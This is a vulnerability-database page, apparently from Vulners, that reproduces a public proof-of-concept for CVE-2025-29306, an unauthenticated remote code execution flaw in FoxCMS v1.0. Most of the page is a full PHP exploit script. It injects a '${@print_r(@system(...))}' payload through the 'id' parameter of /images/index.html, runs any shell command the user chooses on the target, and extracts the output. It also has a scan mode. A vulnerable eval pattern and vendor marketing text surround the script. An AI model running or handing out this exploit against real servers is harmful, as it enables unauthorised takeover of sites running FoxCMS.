Vulners
Lucene search
📄 FoxCMS 1.0 Code Injection
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Exploit for Code Injection in Foxcms | 22 Apr 202509:00 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 25 Mar 202508:12 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 18 Sep 202504:53 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 26 Nov 202518:13 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 10 May 202513:14 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 25 Apr 202503:45 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 7 Jan 202605:08 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 17 Apr 202508:44 | – | githubexploit |
 | CVE-2025-29306 | 27 Mar 202520:50 | – | circl |
 | FoxCMS 代码注入漏洞 | 27 Mar 202500:00 | – | cnnvd |
10
=============================================================================================================================================
| # Title : FoxCMS v1.0 php code innjection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://sourceforge.net/projects/fox-cms/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/190551/ & CVE-2025-29306
[+] Summary
A critical remote code execution vulnerability exists in FoxCMS v1.0 that allows unauthenticated attackers to execute arbitrary operating system commands
via the 'id' parameter in the /images/index.html endpoint.
The vulnerability stems from improper input sanitization and direct code evaluation.
The vulnerability exists in the FoxCMS v1.0 /images/index.html endpoint where user-supplied input in the 'id' parameter is directly evaluated without proper sanitization.
The system fails to validate and sanitize user input, allowing attackers to inject and execute arbitrary PHP code.
[+] Vulnerable Code Pattern:
```php
// In /images/index.html or related component
<?php
// Vulnerable code structure (reconstructed)
$user_input = $_GET['id'];
// Input is directly evaluated without sanitization
eval("some_function($user_input);");
// Or similar dangerous construct
?>
[+] Usage:
Usage: php exploit.php https://victim.com "id"
[+] POC :
<?php
/**
* CVE-2025-29306 Exploit - FoxCMS v1.0 Remote Code Execution
* By: indoushka
* Vulnerability: RCE via /images/index.html id parameter
*/
class FoxCMSExploit {
private $colors;
public function __construct() {
$this->colors = [
'RED' => "\033[91m",
'GREEN' => "\033[92m",
'YELLOW' => "\033[93m",
'BLUE' => "\033[94m",
'MAGENTA' => "\033[95m",
'CYAN' => "\033[96m",
'WHITE' => "\033[97m",
'BOLD' => "\033[1m",
'RESET' => "\033[0m"
];
}
private function color($text, $color) {
return $this->colors[$color] . $text . $this->colors['RESET'];
}
private function showBanner() {
$banner = $this->color("
", 'CYAN') .
$this->color("
", 'MAGENTA') .
$this->color("\n CVE-2025-29306 - FoxCMS v1.0 RCE Exploit\n", 'RED') .
$this->color(" @indoushka\n\n", 'WHITE');
echo $banner;
}
private function makeRequest($url) {
$context = stream_context_create([
'http' => [
'timeout' => 10,
'ignore_errors' => true,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
$response = @file_get_contents($url, false, $context);
if ($response === false) {
return ['success' => false, 'error' => 'Request failed'];
}
return ['success' => true, 'content' => $response];
}
private function extractCommandOutput($html) {
// Try multiple extraction methods
$output = '';
// Method 1: Simple tag stripping
$cleaned = strip_tags($html);
// Method 2: Look for command output patterns
if (preg_match('/<ul[^>]*>(.*?)<\/ul>/si', $html, $matches)) {
$output = strip_tags($matches[1]);
}
// Method 3: Extract between common output markers
if (preg_match('/\b(root|bin|daemon|system)\b/i', $cleaned)) {
$output = $cleaned;
}
// Clean up the output
$output = preg_replace('/\s+/', ' ', $output);
$output = trim($output);
return $output ?: $cleaned;
}
public function execute($target, $command) {
$this->showBanner();
echo $this->color("[*] Target: ", 'BLUE') . $target . "\n";
echo $this->color("[*] Command: ", 'BLUE') . $command . "\n\n";
// Construct the exploit URL
$payload = '${@print_r(@system("' . $command . '"))}';
$encodedPayload = urlencode($payload);
$exploitUrl = rtrim($target, '/') . '/images/index.html?id=' . $encodedPayload;
echo $this->color("[*] Sending RCE payload...", 'YELLOW') . "\n";
echo $this->color("[*] Exploit URL: ", 'CYAN') . $exploitUrl . "\n\n";
$response = $this->makeRequest($exploitUrl);
if (!$response['success']) {
echo $this->color("[!] Request failed: " . $response['error'], 'RED') . "\n";
return;
}
$output = $this->extractCommandOutput($response['content']);
if (empty(trim($output))) {
echo $this->color("[!] No command output received", 'RED') . "\n";
echo $this->color("[*] Response preview:", 'YELLOW') . "\n";
echo substr($response['content'], 0, 500) . "\n\n";
} else {
echo $this->color("[+] Command output:", 'GREEN') . "\n";
echo $this->color(str_repeat("=", 60), 'CYAN') . "\n";
echo $output . "\n";
echo $this->color(str_repeat("=", 60), 'CYAN') . "\n";
}
// Test additional commands for verification
$this->testAdditionalCommands($target);
}
private function testAdditionalCommands($target) {
echo $this->color("\n[*] Testing additional verification commands...", 'YELLOW') . "\n";
$testCommands = [
'whoami' => 'Current user',
'pwd' => 'Current directory',
'uname -a' => 'System information'
];
foreach ($testCommands as $cmd => $description) {
$payload = '${@print_r(@system("' . $cmd . '"))}';
$encodedPayload = urlencode($payload);
$testUrl = rtrim($target, '/') . '/images/index.html?id=' . $encodedPayload;
$response = $this->makeRequest($testUrl);
if ($response['success']) {
$output = $this->extractCommandOutput($response['content']);
if (!empty(trim($output))) {
echo $this->color("[+] $description: ", 'GREEN') . trim($output) . "\n";
}
}
}
}
public function scan($target) {
$this->showBanner();
echo $this->color("[*] Scanning target for FoxCMS vulnerability: ", 'BLUE') . $target . "\n\n";
$testUrl = rtrim($target, '/') . '/images/index.html';
// First check if endpoint exists
echo $this->color("[*] Checking if /images/index.html exists...", 'YELLOW') . "\n";
$response = $this->makeRequest($testUrl);
if (!$response['success']) {
echo $this->color("[-] Endpoint not accessible", 'RED') . "\n";
return false;
}
echo $this->color("[+] Endpoint is accessible", 'GREEN') . "\n";
// Test with simple command
$testCommand = 'echo "VULNERABLE"';
$payload = '${@print_r(@system("' . $testCommand . '"))}';
$encodedPayload = urlencode($payload);
$exploitUrl = $testUrl . '?id=' . $encodedPayload;
echo $this->color("[*] Testing for RCE vulnerability...", 'YELLOW') . "\n";
$response = $this->makeRequest($exploitUrl);
if ($response['success'] && strpos($response['content'], 'VULNERABLE') !== false) {
echo $this->color("[+] Target is VULNERABLE to CVE-2025-29306!", 'RED') . "\n";
return true;
} else {
echo $this->color("[-] Target does not appear to be vulnerable", 'GREEN') . "\n";
return false;
}
}
}
// Main execution
if (php_sapi_name() === 'cli') {
if ($argc < 2) {
echo "CVE-2025-29306 - FoxCMS v1.0 RCE Exploit\n";
echo "Usage:\n";
echo " php exploit.php <target_url> [command]\n";
echo " php exploit.php <target_url> --scan\n";
echo "\nExamples:\n";
echo " php exploit.php https://victim.com \"id\"\n";
echo " php exploit.php https://victim.com \"ls -la\"\n";
echo " php exploit.php https://victim.com --scan\n";
echo "\nDescription:\n";
echo " Exploits RCE vulnerability in FoxCMS v1.0 via /images/index.html id parameter\n";
exit(1);
}
$target = $argv[1];
$command = $argv[2] ?? '--scan';
if (!filter_var($target, FILTER_VALIDATE_URL)) {
echo "Error: Invalid target URL\n";
exit(1);
}
$exploit = new FoxCMSExploit();
if ($command === '--scan') {
$exploit->scan($target);
} else {
$exploit->execute($target, $command);
}
} else {
echo "This script is intended for command line use only.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Dec 2025 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 3.19.8
EPSS0.4375
SSVC